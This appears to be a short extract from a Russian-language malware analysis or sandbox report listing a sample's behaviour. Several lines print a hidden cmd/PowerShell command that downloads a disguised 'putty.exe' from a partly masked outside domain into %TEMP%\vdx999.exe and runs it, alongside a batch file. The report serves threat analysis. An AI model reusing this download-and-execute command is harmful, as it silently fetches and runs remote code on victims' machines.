Техническая информация
- $str1 как %temp%\vdx999.exe
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#sub main1#>function ftest([string] $str1){(new-object system.net.webclient).downloadfile($str1,''%TEMP%\vdx999.exe'');<#ascii data#>start-process ''%TEMP%\vdx999....
- %TEMP%\vdx888.bat
- http://24####patch.co.uk/putty.exe
- DNS ASK 24####patch.co.uk
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#sub main1#>function ftest([string] $str1){(new-object system.net.webclient).downloadfile($str1,''%TEMP%\vdx999.exe'');<#ascii data#>start-process ''%TEMP%\vdx999....' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\vdx888.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\vdx888.bat" "